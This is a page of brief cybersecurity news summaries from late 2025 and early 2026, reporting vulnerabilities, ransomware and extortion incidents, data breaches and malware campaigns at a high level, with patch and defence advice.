A critical zero-day command injection vulnerability, CVE-2026-0625, is being actively exploited in the wild, affecting multiple end-of-life (EOL) D-Link DSL router models. The flaw, rated 9.3 on the CVSS scale, allows unauthenticated remote attackers to execute arbitrary code by sending a malicious request to the 'dnscfg.cgi' endpoint. Exploitation has been observed since at least November 2025, with attackers using it for 'DNSChanger' style attacks. D-Link has confirmed the vulnerability but stated that since the affected products are discontinued, no security patches will be issued. Owners are strongly advised to immediately retire and replace the vulnerable devices to prevent compromise.

Jan 8, 2026 · 4 min read

Black Cat Group Targets Notepad++ Users in Massive SEO Poisoning Campaign

The notorious Black Cat (ALPHV) cybercrime group is behind a large-scale SEO poisoning campaign that uses malicious advertisements and manipulated search results to distribute an information-stealing backdoor. The campaign targets users searching for popular software like Notepad++. Victims are lured to convincing fake download sites, which redirect them to a GitHub clone to download a trojanized installer. The malware uses DLL side-loading to execute its payload, which is capable of stealing browser credentials, cookies, and keystrokes. A report from CNCERT/CC and ThreatBook revealed the campaign was highly effective, compromising nearly 278,000 hosts in China in just two weeks.

Jan 8, 2026 · 5 min read

Brightspeed Investigates Breach Claim by Crimson Collective Affecting 1M+ Customers

US fiber broadband provider Brightspeed is actively investigating a data breach claim made by the 'Crimson Collective' extortion group. The threat actors allege they have stolen a massive dataset containing the personally identifiable information (PII) of over one million customers, including names, addresses, phone numbers, and some payment data. The group, known for targeting AWS cloud environments, has threatened to leak the data if their demands are not met and has reportedly offered the dataset for sale. Brightspeed serves 20 states and has acknowledged the claim, stating it is working to determine its validity. The incident follows a pattern for Crimson Collective, which previously breached Red Hat.

Jan 8, 2026 · 5 min read

CISA Warns of RCE Flaw in Hitachi Energy ICS Product

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an Industrial Control Systems (ICS) advisory, ICSA-26-008-01, for a vulnerability in Hitachi Energy's Asset Suite. The flaw, CVE-2025-10492, could allow a remote attacker to achieve remote code execution (RCE). The vulnerability stems from an insecure third-party component, Jasper Report, used within the Asset Suite product, which is deployed in the energy sector. While there are no reports of active exploitation, CISA and Hitachi Energy are urging customers to apply mitigations and follow security best practices, such as ensuring control systems are not exposed to the internet.

Jan 8, 2026 · 4 min read

TridentLocker Ransomware Strikes Claims Giant Sedgwick in Breach-then-Encrypt Attack

Global claims management leader Sedgwick has reportedly been targeted by the TridentLocker ransomware group. The attack follows the increasingly common 'breach-then-encrypt' model, where threat actors first exfiltrate sensitive data before deploying ransomware to encrypt systems. TridentLocker claims to have stolen data from systems supporting Sedgwick's government services operations, a move designed to maximize pressure for a ransom payment. This incident underscores the evolution of ransomware from a simple availability attack to a complex data breach and extortion scheme. For service providers like Sedgwick, which manage vast amounts of third-party regulated data, such an attack poses significant operational, financial, and reputational risks.

Jan 8, 2026 · 4 min read

No MFA, No Problem: "Zestix" Actor Breaches 50 Firms Using Stolen Credentials

A threat actor identified as 'Zestix' (or 'Sentap') has successfully compromised approximately 50 global enterprises by simply logging into their corporate file-sharing portals with valid credentials. According to research from Hudson Rock, the attacks were not sophisticated zero-day exploits but a direct result of a fundamental security failure: the absence of multi-factor authentication (MFA). The actor acquired credentials harvested by infostealer malware like RedLine and Lumma from infected employee devices. They then used these credentials to access sensitive data stored on platforms such as Progress ShareFile, Nextcloud, and OwnCloud. High-profile victims include Iberia Airlines and Sekisui House, highlighting a 'global epidemic of cloud exposure' and the critical, non-negotiable need for MFA across all enterprise applications.

Jan 7, 2026 · 4 min read

Ni8mare: Critical Unauthenticated RCE Flaw (CVSS 10.0) Hits n8n Automation Platform

A critical, unauthenticated remote code execution (RCE) vulnerability, codenamed 'Ni8mare' and tracked as CVE-2026-21858, has been disclosed in the popular n8n workflow automation platform. The flaw, which carries the maximum possible CVSS score of 10.0, allows a remote attacker to gain complete control over a vulnerable, self-hosted n8n instance without any credentials. Discovered by Cyera Research Labs, the vulnerability stems from a Content-Type confusion issue where a file-handling function can be improperly invoked. A successful exploit could lead to the theft of sensitive credentials stored in workflows, full server compromise, and lateral movement into connected corporate systems. All self-hosted n8n versions prior to 1.121.0 are affected, and administrators are urged to patch immediately as proof-of-concept details are now public.

Jan 7, 2026 · 4 min read

Second CVSS 10.0 RCE Hits n8n, Allows Authenticated Takeover

A second maximum-severity vulnerability, CVE-2026-21877, has been disclosed in the n8n workflow automation platform, also rated CVSS 10.0. Unlike the recently revealed unauthenticated flaw, this vulnerability requires an attacker to be an authenticated user. A low-privileged user can exploit the flaw to achieve remote code execution (RCE), leading to a full takeover of the n8n instance. This could allow an attacker to steal credentials, disrupt workflows, and pivot into connected internal systems. The vulnerability affects both self-hosted and cloud versions of n8n. A patch was released in version 1.121.3 in November 2025, but organizations running older versions remain at high risk. This string of critical flaws puts immense pressure on n8n administrators to patch and secure their instances.

Jan 7, 2026 · 4 min read

NIST Releases Draft Cybersecurity Framework Profile for AI

The U.S. National Institute of Standards and Technology (NIST) has released a preliminary draft of a Cybersecurity Framework (CSF) Profile for Artificial Intelligence. This new guidance, intended to be used with CSF 2.0 and the AI Risk Management Framework (AI RMF), aims to help organizations manage the unique cybersecurity risks associated with developing, deploying, and using AI. The draft profile is structured around three focus areas: 'Secure,' 'Defend/Thwart,' and 'Respond,' providing guidance on topics like AI agent identity, preventing arbitrary code execution by AI, and responding to AI-related security incidents. NIST is seeking public comment on the draft until January 30, 2026.

Jan 7, 2026 · 3 min read

ownCloud Urges Users to Enable MFA as Credential Stuffing Attacks Surge

In a proactive security move, the developers of the ownCloud file-sharing platform have issued a warning to all users, strongly advising them to enable multi-factor authentication (MFA). The advisory, released on January 7, 2026, is a direct response to recent reports of the 'Zestix' threat actor breaching dozens of organizations by logging into cloud portals that lacked MFA with credentials harvested by infostealer malware. While ownCloud was not named as a victim in that specific campaign, it is a known target for such attacks. The company is emphasizing that strong passwords alone are insufficient and that MFA is an indispensable layer of defense against credential stuffing and password reuse attacks.

Jan 7, 2026 · 3 min read

Qualcomm Issues January Security Bulletin Addressing Multiple Vulnerabilities

Qualcomm has published its January 2026 security bulletin, addressing multiple vulnerabilities of varying severities across a wide range of its products. The bulletin was highlighted by an advisory from the Canadian Centre for Cyber Security on January 7, 2026. Given the ubiquitous nature of Qualcomm chipsets in mobile phones, IoT devices, and automotive systems, these vulnerabilities could have a widespread impact. The specific CVEs and affected products are detailed in the bulletin itself. Users and administrators are urged to review the bulletin and apply necessary firmware or software updates from their device manufacturers as they become available to mitigate potential risks.

Jan 7, 2026 · 3 min read

Lapsus$ Hacking Group Is Back with Evolved Extortion Tactics

The notorious Lapsus$ extortion group, known for its high-profile breaches of major tech companies, has reportedly resurfaced. According to a threat intelligence report from January 7, 2026, remnants of the group have reformed and evolved, integrating tactics from other cybercriminal operations. The new iteration of Lapsus$ is said to be shifting its focus towards more nuanced identity-based extortion schemes, moving beyond simple data theft. This evolution suggests a more complex and harder-to-detect threat, leveraging compromised identities for persistent and subtle attacks. Security teams are warned to be on high alert for sophisticated social engineering and extortion attempts targeting employee identities.

Jan 7, 2026 · 4 min read

CISA Adds Two New Actively Exploited Vulnerabilities to KEV Catalog

On January 7, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The specific details of the flaws have not been disclosed, but their inclusion confirms they are under active exploitation by malicious actors. In accordance with Binding Operational Directive (BOD) 22-01, Federal Civilian Executive Branch (FCEB) agencies are now required to identify and remediate these vulnerabilities by a specified deadline. CISA strongly urges all public and private sector organizations to review the KEV catalog and prioritize patching these vulnerabilities to defend against active threats.

Jan 7, 2026 · 3 min read

Kimwolf Botnet Hijacks 2M Android Devices via Proxy Networks

The Kimwolf botnet has rapidly expanded to infect over 2 million devices worldwide, primarily targeting low-cost Android-based TV and streaming boxes. Active since at least mid-2025, the botnet operators monetize their network by launching large-scale DDoS attacks, surreptitiously installing applications, and selling residential proxy bandwidth. The botnet's growth is fueled by its exploitation of residential proxy networks to infect devices behind home routers, with some evidence suggesting devices are being sold pre-infected.

Jan 6, 2026 · 5 min read

Russia-Aligned UAC-0184 Uses Viber to Target Ukrainian Military

The Russia-aligned threat group UAC-0184 (also tracked as Hive0156) has evolved its tactics to include the Viber messaging platform for malware distribution. The group is targeting Ukrainian military and government departments with malicious ZIP archives containing LNK files. When opened, these files deploy the Remcos Remote Administration Tool (RAT), enabling the attackers to conduct espionage. This new vector supplements their previous methods of using phishing emails and other messaging apps like Signal and Telegram.

Jan 6, 2026 · 6 min read

New Privacy & Cybersecurity Laws Take Effect Across US States

January 1, 2026, marked the effective date for a significant wave of new state-level privacy and cybersecurity laws in the United States. Comprehensive privacy laws are now active in Indiana, Kentucky, and Rhode Island. Concurrently, new regulations under the California Consumer Privacy Act (CCPA) covering cybersecurity audits, risk assessments, and automated decision-making technology (ADMT) have also come into force, increasing compliance obligations for businesses operating in these states.

Jan 6, 2026 · 5 min read

EmEditor Website Hacked to Distribute Infostealer Malware

Emurasoft, the developer of the popular EmEditor text editor, has disclosed that its official website was compromised for a four-day period. During the breach, the main download button on the homepage was redirected to a malicious server hosting a trojanized installer. Users who downloaded and ran this fake installer were infected with an infostealer malware designed to harvest system credentials. The malware also installed a rogue browser extension capable of remote control and cryptocurrency swapping.

Jan 6, 2026 · 6 min read

Korean Air Subsidiary Breach Exposes Data of 30,000 Employees

South Korean airline Korean Air has confirmed a significant data breach affecting approximately 30,000 current and former employees. The incident occurred not on the airline's network, but at a former subsidiary and key catering supplier, Korean Air Catering & Duty-Free (KC&D). Attackers infiltrated the supplier's systems and exfiltrated sensitive employee data, including full names and bank account numbers. This supply chain attack highlights the persistent risk posed by third-party vendors. No customer data was impacted; the breach was confined to employee information stored on the supplier's compromised network.

Jan 6, 2026 · 5 min read

TridentLocker Ransomware Hits Sedgwick's Federal Contracting Arm

Claims administration giant Sedgwick confirmed on January 4, 2026, that its government-focused subsidiary, Sedgwick Government Solutions (SGS), was breached by the emerging TridentLocker ransomware group. The attackers employed a double-extortion strategy, exfiltrating 3.4 GB of data from an isolated file transfer system and threatening its public release. SGS is a major federal contractor for U.S. agencies like the Department of Homeland Security and CISA, making this a significant supply chain security incident.

Jan 5, 2026 · 6 min read

Flaws in Airoha Bluetooth Chips Expose Headphones from Sony, Bose to Hijacking

A set of critical vulnerabilities has been disclosed in Bluetooth System-on-Chips (SoCs) from Airoha, a major supplier for popular headphone brands including Sony, Bose, and JBL. The flaws, tracked up to CVE-2025-20702, exist in an unauthenticated diagnostic protocol called RACE. An attacker within Bluetooth range can exploit these flaws to connect to a device without pairing, read or write to memory, access the microphone for eavesdropping, and steal Bluetooth link keys to impersonate the device. The vulnerabilities pose a significant privacy and security risk to millions of consumer electronics users.

Jan 5, 2026 · 6 min read

Ransomware Goes Global, Targeting New Regions and Industries with Weaker Defenses

Ransomware is becoming a more globalized and unpredictable threat, according to the H2 2025 Global Threat Briefing from cyber analytics firm CyberCube. The report warns that ransomware groups are actively expanding into new geographic regions and industry sectors that have historically seen fewer attacks, often targeting those with less mature cyber defenses. The highly active LockBit ransomware-as-a-service (RaaS) group is a key driver of this trend. The findings suggest that traditional risk models based on geography or industry are becoming less reliable predictors of attack likelihood.

Jan 4, 2026 · 5 min read

Taiwan Reports 2.6 Million Daily Cyberattacks from China in 2025

Taiwan's National Security Bureau (NSB) released a report on January 4, 2026, detailing a massive and sustained cyber offensive by Chinese state-backed actors throughout 2025. The island faced an average of 2.63 million cyberattacks daily, a 6% increase from 2024 and double the rate of 2023. The attacks are described as a core component of Beijing's hybrid warfare strategy, targeting nine critical sectors including energy, healthcare, and government agencies. The NSB identified prominent threat groups like BlackTech, Flax Typhoon, and APT41 behind the campaigns, which utilized vulnerability exploitation, DDoS attacks, and supply chain intrusions. The energy sector saw an alarming 1,000% increase in attacks, underscoring a strategic effort to probe and potentially disrupt Taiwan's essential services.

Jan 4, 2026 · 5 min read

Petlibro Smart Feeder API Flaw Lets Anyone Control Devices, Access Cameras

A serious improper access control vulnerability, CVE-2025-3653, has been found in the backend API for Petlibro's smart pet feeders. The flaw allows a remote attacker to take full control of any Petlibro device simply by sending its serial number to the API, with no authentication required. A successful attacker can alter feeding schedules, dispense food on command, and, on camera-equipped models, view the live video feed. Disclosed by VulnCheck, the vulnerability affects Petlibro Smart Pet Feeder Platform versions up to 1.7.31 and highlights the persistent failure of some IoT manufacturers to implement basic security controls, creating significant privacy and safety risks for consumers.

Jan 4, 2026 · 4 min read

Critical Flaw in GNU Wget2 Allows Arbitrary File Overwrites

A critical vulnerability, CVE-2025-69194, has been discovered in GNU Wget2, the modern replacement for the ubiquitous Wget file download utility. The flaw is an improper path validation issue (path traversal) that can be triggered by a malicious remote server. An attacker can trick a vulnerable Wget2 client into writing a downloaded file to an arbitrary location on the filesystem. This could be exploited to overwrite critical system files, user configuration files (like .bashrc), or place malicious scripts in sensitive locations, potentially leading to data loss, denial of service, or remote code execution.

Jan 4, 2026 · 4 min read

A Look Inside the CVE Process: The Story of a Rejected ID

On January 3, 2026, the National Vulnerability Database (NVD) officially updated the status of CVE-2025-34775 to 'REJECTED'. This status indicates that while the identifier was reserved by a CVE Numbering Authority (CNA), it was ultimately not used for a public vulnerability disclosure. This can occur for several reasons, such as the finding being a duplicate of an existing CVE, the issue not meeting the criteria for a vulnerability, or the researcher withdrawing the submission. While rejected CVEs contain no technical details, their existence provides transparency into the administrative backend of the global vulnerability tracking system.

Jan 4, 2026 · 2 min read

Critical RCE in Xspeeder SXZOS Allows Unauthenticated Root Access

A critical remote code execution (RCE) vulnerability, CVE-2025-54322, has been discovered in Xspeeder SXZOS networking appliances. The flaw allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges. The vulnerability exists in the '/vLogin' API endpoint, which improperly processes base64-encoded Python payloads, leading to complete device compromise. Administrators are urged to patch immediately due to the ease of exploitation and the severity of the flaw.

Jan 4, 2026 · 5 min read

Clop Ransomware Hits Korean Air in Supply Chain Attack, Exploiting Oracle Zero-Day

Korean Air announced on December 29, 2025, that it suffered a data breach affecting the personal information of approximately 30,000 employees. The breach was the result of a supply chain attack targeting KC&D Service, a former subsidiary. The incident is believed to be the work of the prolific Clop ransomware group (also known as TA505 or FIN11), which exploited a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. This remote code execution flaw, with a CVSS score of 9.8, is part of a wider Clop campaign targeting the aviation industry's supply chain.

Jan 3, 2026 · 5 min read

Handala Group Doxes Israeli Intel Agents in Psyops Campaign

The Iran-linked hacktivist group Handala has intensified its information warfare against Israel by publicly exposing the identities of 15 alleged Signals Intelligence (SIGINT) officers on January 3, 2026. This act of doxing is the latest in a series of campaigns designed to inflict psychological and reputational damage on Israeli intelligence and government officials. Investigations by cybersecurity firm KELA suggest Handala's primary attack vector is not sophisticated device hacking but rather the compromise of messaging applications like Telegram, likely through social engineering or session hijacking. The group, believed to be associated with Iran's Ministry of Intelligence and the 'Banished Kitten' cyber unit, frames these leaks as strategic blows, having previously targeted high-profile figures and released documents related to Israel's Iron Dome system and Unit 8200.

Jan 3, 2026 · 5 min read

Tokyo FM Radio Hit by Massive Data Breach, 3 Million Records for Sale

A threat actor using the alias 'victim' has claimed responsibility for a major data breach against Tokyo FM Broadcasting Co., LTD., one of Japan's largest radio stations. On January 1, 2026, the attacker announced on a hacker forum that they had stolen a database containing over 3 million records. The compromised data allegedly includes a vast amount of personally identifiable information (PII) from listeners, such as names, addresses, and birth dates, as well as sensitive internal data like employee login credentials. The attacker stated they attempted to disclose the vulnerability to the company but received no response, prompting them to sell the data. If confirmed, this breach would represent a significant violation of Japan's Act on the Protection of Personal Information (APPI), exposing Tokyo FM to severe regulatory penalties and reputational damage.

Jan 3, 2026 · 5 min read

KIOTI Tractor Discloses Wider Impact from 2024 Data Breach

Daedong-USA, Inc., parent company of the KIOTI® Tractor Division, issued a notice on January 2, 2026, expanding the scope of a data breach that originally occurred in October 2024. A prolonged investigation that concluded in late 2025 revealed that a wider range of highly sensitive personal information was stolen by an unauthorized party than first realized. The compromised data affects a number of current and former employees, their dependents, and some customers. The stolen information includes names, Social Security numbers, driver's licenses, passport numbers, financial account details, and private health information. The company has begun notifying the newly identified victims and has set up a call center to address concerns, emphasizing that this is an update to a past incident, not a new breach.

Jan 3, 2026 · 5 min read

Resecurity Turns Tables on Hackers, Claims Breach Was a Honeypot

Cybersecurity firm Resecurity has publicly refuted claims of a major data breach made by a hacking group known as 'Scattered Lapsus$ Hunters' (SLH). On January 3, 2026, the group announced on Telegram that it had compromised Resecurity's systems, stealing internal data and client information. Resecurity swiftly responded, asserting that the attackers had not breached any production systems but were instead contained within a sophisticated honeypot environment. The firm stated that the screenshots posted by SLH as 'proof' were from this decoy system, which was filled with synthetic data. Resecurity claims the successful deception allowed them to gather valuable threat intelligence on the attackers' TTPs, effectively turning a potential attack into an intelligence-gathering operation.

Jan 3, 2026 · 5 min read

Finland Arrests Two in Probe of Damaged Undersea Telecom Cable

Finnish authorities have arrested two crew members of the cargo ship 'Fitburg' in connection with significant damage to an undersea telecommunications cable in the Gulf of Finland. The incident, which occurred around New Year's Eve, disrupted a critical data link owned by Elisa that connects Finland and Estonia. Investigators reported the ship was observed dragging its anchor at the exact time and location of the cable break. The investigation is being treated as potential sabotage and interference with telecommunications, heightening concerns about hybrid threats to critical infrastructure in the strategically sensitive Baltic Sea region. The incident follows a pattern of disruptions to undersea infrastructure since the start of the war in Ukraine.

Jan 3, 2026 · 5 min read

VVS Stealer Malware Uses PyArmor Obfuscation to Target Discord Users

A new information-stealing malware named VVS Stealer is being sold on Telegram and used to target Discord users. Written in Python, the stealer's key feature is its use of the legitimate tool PyArmor to heavily obfuscate its code, allowing it to bypass static analysis and signature-based antivirus detection. Once on a victim's system, VVS Stealer establishes persistence and proceeds to steal a wide range of data. It specifically targets Discord, using the Windows DPAPI to decrypt authentication tokens and malicious JavaScript injection to capture password changes in real-time. The malware also exfiltrates cookies, history, and saved passwords from nearly 20 different web browsers, sending the stolen data to an attacker-controlled Discord webhook.

Jan 3, 2026 · 5 min read

Infostealers Fuel Vicious Cycle, Hijacking Victim Websites to Spread More Malware

A new report from Hudson Rock highlights a dangerous and self-perpetuating cybercrime trend where credentials stolen by infostealer malware are used to hijack legitimate business websites. Attackers gain administrative access to platforms like WordPress using the stolen logins, then inject malicious scripts to turn the trusted sites into malware distribution points. These compromised sites are then used in campaigns employing social engineering tactics like 'ClickFix,' which tricks visitors into executing malicious PowerShell commands. This creates a vicious feedback loop: infostealers harvest credentials, which are used to compromise websites, which then distribute more infostealers like Lumma and Vidar, amplifying the scale and effectiveness of their campaigns.

Jan 3, 2026 · 5 min read

Over 10,000 Fortinet Firewalls Exposed to Critical 2FA Bypass Flaw

Security watchdog Shadowserver revealed on January 2, 2026, that over 10,000 Fortinet FortiGate firewalls remain unpatched and vulnerable to a critical, five-year-old 2FA bypass flaw, CVE-2020-12812. This vulnerability, rated 9.8 on the CVSS scale, allows an attacker with valid credentials to bypass FortiToken-based two-factor authentication by simply changing the case of the username during login. The flaw stems from a mismatch where FortiGate is case-sensitive, but the backend LDAP server is not. Despite patches being available since July 2020 and CISA adding it to its Known Exploited Vulnerabilities (KEV) catalog, thousands of devices, including over 1,300 in the US, remain exposed and are being actively exploited by threat actors.

Jan 3, 2026 · 5 min read

Critical Auth Bypass Flaw (CVSS 9.8) in IBM API Connect

IBM has issued an urgent security advisory for a critical authentication bypass vulnerability, CVE-2025-13915, in its API Connect platform. The flaw carries a CVSS score of 9.8, reflecting its potential for severe impact. It could allow a remote, unauthenticated attacker to bypass security controls and gain unauthorized access to applications managed by the platform. The vulnerability affects specific versions of API Connect V10. IBM has released patches and strongly urges customers to apply them immediately. As a temporary mitigation, disabling the self-service sign-up feature on the Developer Portal is recommended. There is currently no evidence of active exploitation.

Jan 2, 2026 · 5 min read

Apple Supply Chain on Alert After Cyberattack Hits Key Chinese Manufacturer

Apple's supply chain is on high alert following a cyberattack in mid-December 2025 against one of its major Chinese manufacturing partners. The breach has raised significant concerns about the potential exposure of sensitive intellectual property, including production-line data and proprietary trade secrets related to Apple products. While the unnamed supplier claims the issue is resolved, internal audits are ongoing to assess the extent of the data loss. The incident highlights the persistent risk to major technology firms from attacks targeting their less secure supply chain partners.

Jan 2, 2026 · 5 min read

Year-End Report: Ransomware Industrializes into Cartels, Edge Devices Become Top Target

A year-end analysis of the 2025 threat landscape highlights two dominant and transformative trends for enterprises. First, Ransomware-as-a-Service (RaaS) has 'industrialized,' with threat groups operating like sophisticated cartels and employing 'Extortion 2.0' tactics that involve both data encryption and theft. Second, network edge devices such as VPNs, firewalls, and routers have become the primary target for state-sponsored actors seeking initial access. Experts recommend 'industrial defenses,' including immutable backups and aggressive patch management, and a strategic shift towards Secure Access Service Edge (SASE) architecture to counter these evolving threats.

Jan 1, 2026 · 5 min read

Report: AI-Powered Social Engineering and Identity Attacks Dominated 2025

The 2025 Threat-Led Defense Report from Tidal Cyber reveals a significant shift in the threat landscape, where attackers are adapting faster than security defenses. Key trends from 2025 include the widespread adoption of AI to automate and scale highly convincing social engineering campaigns, and a strategic pivot towards identity-driven attacks. Adversaries are increasingly targeting SaaS platforms, cloud administration accounts, and single sign-on (SSO) services to gain broad access without deploying traditional malware. The report also notes that zero-day exploits are now being leveraged by a wider range of criminal and hybrid actors, not just elite state-sponsored groups.

Jan 1, 2026 · 6 min read

Hackers Use Animated Lures and Fake Legal Warnings to Spread Malware

HP's latest Threat Insights Report reveals a significant evolution in social engineering tactics, with cybercriminals using highly convincing lures such as professional animations and fake legal warnings to trick users into downloading malware. The report highlights a campaign impersonating the Colombian Prosecutor's Office to deliver PureRAT. It also details the abuse of trusted platforms like Discord for hosting malicious payloads like the Phantom Stealer and notes the rising threat of session cookie hijacking.

Dec 31, 2025 · 4 min read

European Space Agency Probes Breach; Hacker Claims 200GB of Data for Sale

The European Space Agency (ESA) is investigating a security incident after a threat actor, using the alias "888," claimed to have breached its systems and stolen 200GB of data. The agency confirmed the breach was limited to external servers used for unclassified collaborative engineering work and that its primary corporate network remains secure. The hacker is attempting to sell the stolen data, which reportedly includes source code, project documentation, and API keys, on a cybercrime forum, raising concerns about potential intelligence gathering and future supply chain attacks.

Dec 31, 2025 · 6 min read

Petco Data Breach Exposes Customer SSNs and Financial Info Due to Misconfiguration

Pet product retailer Petco has disclosed a data breach caused by a software misconfiguration that left highly sensitive customer files accessible on the internet. The exposed data includes full names, Social Security numbers, driver's license numbers, and financial account details, including credit and debit card numbers. The company discovered the issue internally and has since corrected the misconfiguration. Filings with state attorneys general indicate at least 500 California residents are affected, with an unknown number of victims in other states.

Dec 31, 2025 · 5 min read

Malicious Trust Wallet Chrome Extension Pushed via Leaked API Key, $7M Stolen

Trust Wallet confirmed on December 26, 2025, that a malicious version of its Chrome browser extension (v2.68) was published, leading to the theft of approximately $7 million in cryptocurrency from 2,596 wallet addresses. The attackers bypassed internal security checks by using a leaked Chrome Web Store API key to publish the compromised version directly. The malicious code was hidden within the application's analytics logic, using the PostHog library to exfiltrate user data to an attacker-controlled server. Over $4 million of the stolen funds have already been laundered through centralized exchanges. Trust Wallet has suspended the malicious domain and is processing reimbursements for affected users.

Dec 31, 2025 · 5 min read

2025: The Year Cybersecurity 'Crossed the AI Rubicon'

According to analysis published on December 14, 2025, the year 2025 represents a fundamental and irreversible turning point for the cybersecurity industry. The widespread integration of Artificial Intelligence (AI) into both offensive and defensive strategies has permanently altered the threat landscape. Key trends include the rise of 'agentic AI' capable of autonomous attacks, adaptive threats that change tactics in real-time, and a surge in highly convincing, AI-generated phishing and deepfake content. While defenders are also adopting AI, the 'great acceleration' in threat complexity is forcing a complete rethink of security playbooks.

Dec 30, 2025 · 4 min read

Maximum Severity RCE Flaw in SmarterMail Puts Mail Servers at Risk

A critical, unauthenticated arbitrary file upload vulnerability in SmarterMail, tracked as CVE-2025-52691, has been disclosed, earning the maximum possible CVSS score of 10.0. The flaw allows a remote attacker to upload malicious files, such as a web shell, to any location on an affected server without needing credentials. This can lead to remote code execution (RCE), enabling a complete takeover of the mail server. The vulnerability affects SmarterMail builds 9406 and earlier. Although a patch was released in October 2025 (Build 9413), the public disclosure was delayed until late December. The Cyber Security Agency of Singapore (CSA) has issued an alert, urging administrators to update immediately due to the high risk of exploitation, especially for internet-facing mail servers.

Dec 30, 2025 · 5 min read

Insider Threat: Cybersecurity Pros Plead Guilty to ALPHV/BlackCat Ransomware Attacks

In a significant insider threat case, two American cybersecurity professionals, Ryan Goldberg and Kevin Martin, have pleaded guilty to conspiracy to commit extortion. The pair admitted to using their expert knowledge and access gained from their roles in incident response and ransomware negotiation to conduct ransomware attacks against U.S. companies using the ALPHV/BlackCat ransomware variant. Operating as affiliates for the Ransomware-as-a-Service (RaaS) group, they targeted organizations in the healthcare, engineering, and technology sectors, extorting $1.2 million in one case. The Department of Justice announced the pleas on December 30, 2025, highlighting the danger of trusted insiders turning to cybercrime. Both individuals face up to 20 years in prison.

Dec 30, 2025 · 5 min read

Rainbow Six Siege Hacked: Attackers Flood Game with $13M in Currency, Disrupting Economy

Over the weekend of December 27-28, 2025, Ubisoft's popular online shooter, Rainbow Six Siege, was hit by a major security breach. Attackers infiltrated the game's backend systems, distributing approximately 2 billion 'R6 Credits'—the game's premium currency, valued at over $13 million—to every player. The hackers also took control of moderation systems, issuing random bans and unbans, causing widespread chaos. In response, Ubisoft was forced to take the game completely offline to perform a full data rollback. While unconfirmed, some hacker groups have claimed responsibility, alleging they used the recently disclosed 'MongoBleed' exploit to gain access and may have stolen over 900GB of development data.

Dec 30, 2025 · 6 min read

Fallout from 2022 LastPass Breach Continues: Over $35M in Crypto Stolen

The 2022 data breach at password manager LastPass is continuing to enable widespread financial theft, with researchers tracing over $35 million in stolen cryptocurrency to the incident. A report by blockchain intelligence firm TRM Labs reveals that threat actors are systematically cracking the encrypted password vaults stolen in the breach, with thefts observed as recently as October 2025. By brute-forcing weak master passwords, attackers gain access to stored crypto private keys and seed phrases. The stolen funds are being laundered through a sophisticated network involving privacy mixers and high-risk Russian exchanges, pointing to an organized cybercriminal operation. This long-tail exploitation highlights the severe and prolonged risks associated with password manager breaches.

Dec 30, 2025 · 6 min read

Hacker Leaks 2.3M WIRED Subscriber Records, Threatens 40M More from Condé Nast

A threat actor named 'Lovely' has leaked a database containing over 2.3 million records of WIRED magazine subscribers on a hacking forum. The leaked data includes email addresses, internal IDs, and in some cases, full names, phone numbers, and physical addresses. The hacker claims the leak is retaliation against WIRED's parent company, Condé Nast, for ignoring vulnerability disclosure reports for a month. 'Lovely' has threatened to release a much larger dataset of 40 million records from other Condé Nast brands like The New Yorker and Vogue. The data, which has been added to Have I Been Pwned, appears to have been exfiltrated by exploiting web application vulnerabilities such as IDOR or broken access control.

Dec 30, 2025 · 5 min read

Cl0p Implicated in Oracle Zero-Day Attacks, Breaching UPenn and University of Phoenix

The University of Pennsylvania and the University of Phoenix have both reported data breaches resulting from the exploitation of zero-day vulnerabilities in their Oracle E-Business Suite servers. The attacks have compromised the personal information of at least 1,488 individuals at UPenn and a much larger, unspecified number of students, alumni, and staff at the University of Phoenix. Security researchers suspect the notorious Cl0p ransomware gang is behind the campaign, continuing their pattern of exploiting vulnerabilities in widely used enterprise software for large-scale data theft and extortion. Both institutions are currently notifying affected individuals.

Dec 29, 2025 · 5 min read

Hyperjacking: Ransomware Attacks on Hypervisors Skyrocket by 700%

Security vendor Huntress reports a staggering 700% increase in ransomware attacks directly targeting virtualization hypervisors like VMware ESXi and Microsoft Hyper-V in the latter half of 2025. This marks a significant strategic shift by threat actors, with the Akira ransomware group being a primary driver. By compromising the hypervisor, attackers can bypass traditional endpoint security and encrypt dozens or hundreds of virtual machines simultaneously, causing catastrophic operational disruption. The typical attack vector involves exploiting weak or stolen credentials for internet-facing services, such as VPNs without MFA, to gain initial access before moving laterally to the virtualization infrastructure. This trend underscores the critical need for organizations to harden and secure their core virtualization platforms.

Dec 29, 2025 · 6 min read

900,000+ Users Compromised: Malicious Chrome Extensions Steal ChatGPT & DeepSeek Conversations

A significant data theft campaign has been uncovered involving two malicious Google Chrome extensions that were installed by over 900,000 users. The extensions, which impersonated legitimate AI productivity tools, were designed to secretly capture and exfiltrate entire conversation histories from AI platforms like ChatGPT and DeepSeek. In addition to stealing potentially sensitive AI chat data, the malware also monitored all user browsing activity, sending the harvested information to an attacker-controlled command-and-control server at `deepaichats[.]com`. One of the extensions had even received a 'Featured' badge from Google, highlighting the challenge of policing browser extension marketplaces.

Dec 29, 2025 · 4 min read

DevMan Ransomware Group Claims Attack on U.S. Financial Firm Sharinc Inc.

The DevMan ransomware group has claimed responsibility for a cyberattack against Sharinc Inc., a U.S.-based financial organization. The claim was made on December 28, 2025, on the group's data leak site. The attackers have threatened to publish sensitive financial and customer data if their extortion demands are not met. This incident underscores the persistent and targeted threat that ransomware gangs pose to the financial services industry, which remains a high-value target due to the sensitive nature of the data it handles.

Dec 29, 2025 · 5 min read

Software Supply Chain Attacks Doubled in 2025, Report Finds

A year-end security analysis published on December 29, 2025, reveals that software supply chain attacks more than doubled globally in 2025, with associated losses projected to reach $60 billion. The report, from CleanStart, indicates that this has become a systemic risk, with over 70% of organizations experiencing a related security incident. Despite the surge, the report finds that enterprise readiness to combat these threats remains critically low, with most organizations unable to quickly identify compromised components within their software.

Dec 29, 2025 · 4 min read

Microsoft and Adobe Release December Patches for Over 190 Vulnerabilities

In their final security updates for 2025, Microsoft and Adobe addressed a combined total of over 190 vulnerabilities on December 28. Microsoft's Patch Tuesday release fixed 56 flaws, including a critical zero-day privilege escalation vulnerability (CVE-2025-62221) in the Windows Cloud Files Mini Filter Driver that is being actively exploited. Adobe's release was even more extensive, remediating 139 CVEs across a range of products, including Adobe Reader and Experience Manager. Administrators are urged to apply these critical updates promptly to mitigate risks.

Dec 29, 2025 · 4 min read

